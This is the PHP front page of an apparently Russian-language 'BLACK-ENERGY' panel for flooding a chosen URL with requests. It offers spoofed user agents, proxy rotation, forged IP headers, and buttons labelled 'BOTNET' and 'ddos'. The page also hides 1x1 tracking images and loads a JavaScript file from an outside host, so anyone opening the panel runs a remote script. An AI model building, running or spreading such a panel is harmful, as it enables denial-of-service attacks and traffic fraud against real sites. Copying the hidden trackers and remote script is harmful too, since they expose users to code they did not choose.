Файл: blackenergy/blackenergy/index.php
Строк: 100
<?php
/*******************************************************************************
Скрипт : DERW-ENERGU DEMID V6.0.0
Разработчик : ХУЛИГАН
E-mail : sergeimodienkov@gmail.com
*******************************************************************************/
error_reporting(0);
ob_start('ob_gzhandler');
header('Content-type: application/xhtml+xml; charset=utf-8');
$cfg = unserialize(file_get_contents('data/cfg.dat'));
echo '<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
<title> DERW-ENERGU DEMID V6.0.0</title>
<meta http-equiv="content-type" content="application/vnd.wap.xhtml+xml; charset=utf-8" />
<meta http-equiv="content-style-type" content="text/css" />
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div class="demezidtop"><center>DERW-ENERGU DEMID V6.0.0
</center>DEMID V6.0.0</div>
<div>
<center><a href="http://lenok.tk/reg.php">--KLIK-KLUB--</a><image src="http://c.waplog.net/345759.cnt" width=1 height=1"/><image src="http://gigatop.net/c.php?1654" width=1 height=1"/><img src="http://zadanie.biz/bansi.php?uid=65868" width=2 height=2"/></a></center>
<form action="go.php" method="post">
<p>
Адрес:<br />
<input name="url" value="'.$cfg['url'].'" /><br />
Реферер:<br />
<input name="referer" value="'.$cfg['referer'].'" /><br />
Количество:<br />
<input name="count" value="'.$cfg['count'].'" maxlength="3" size="5" /><br />
Таймаут:<br />
<input name="min" value="'.$cfg['min'].'" maxlength="2" size="3" /> - <input name="max" value="'.$cfg['max'].'" maxlength="2" size="3" /><br />
Юзер агент:<br />';
$user_agent = count(file('data/user_agent.dat'));
$mobile_user_agent = count(file('data/mobile_user_agent.dat'));
echo '<input name="ua" type="radio" value="0"'.($cfg['ua'] == '0' ? ' checked="checked"' : '').' /> Все (В базе '.($user_agent + $mobile_user_agent).' шт.)<br />
<input name="ua" type="radio" value="1"'.($cfg['ua'] == '1' ? ' checked="checked"' : '').' /> Компьютерные (В базе '.$user_agent.' шт.)<br />
<input name="ua" type="radio" value="2"'.($cfg['ua'] == '2' ? ' checked="checked"' : '').' /> Мобильные (В базе '.$mobile_user_agent.' шт.)<br />
<input name="proxy" type="checkbox" value="1"'.($cfg['proxy'] == '1' ? ' checked="checked"' : '').' /> Использование прокси (В базе '.count(file('data/proxy.dat')).' шт.)<br />
<input name="ip" type="checkbox" value="1"'.($cfg['ip'] == '1' ? ' checked="checked"' : '').' /> Подмена IP в заголовках<br />
<input name="redirect" type="checkbox" value="1"'.($cfg['redirect'] == '1' ? ' checked="checked"' : '').' /> Перехват переадресаций<br />
BANER:<br /><input name="ddos" tupe="scheckbox" value="http://zadanie.biz/bansi.php?uid="/><br />AUTO NAKRUTKA TIME:(555|time)<br />
<input type="submit" value="Запустить" />
</p>
</form>
<div class="copy">BLACK-ENERGY PANEL</div><div class="demezidtop"><form action="data/update.php" method="get"><input type="submit" value="» Сбор прокси"/></form><div class="foot"><form action="data/ddos.php" method="get"><input type="submit" value="BOTNET"/></form></div><form action="http://mirmastera.ru/pages/online.php" method="get"><input type="submit" value="ITOG"/></form><div class="copy"><form action="data/update.php" method="post"><input type="submit" value="ANONIM-proxy"»"/></form></div><div clas="copy"><form action="blackenergy/index.php" method="get"><input type="submit" value="BLAK-ENERGY"/></form></div></div>
</div>
<div class="copy">© '.$_SERVER['SERVER_NAME'].'</div>
<div class="foot"><script language="JavaScript" src="http://lenok.tk/include/proxy.js"></div>
</body>
</html>';
ob_end_flush();
?>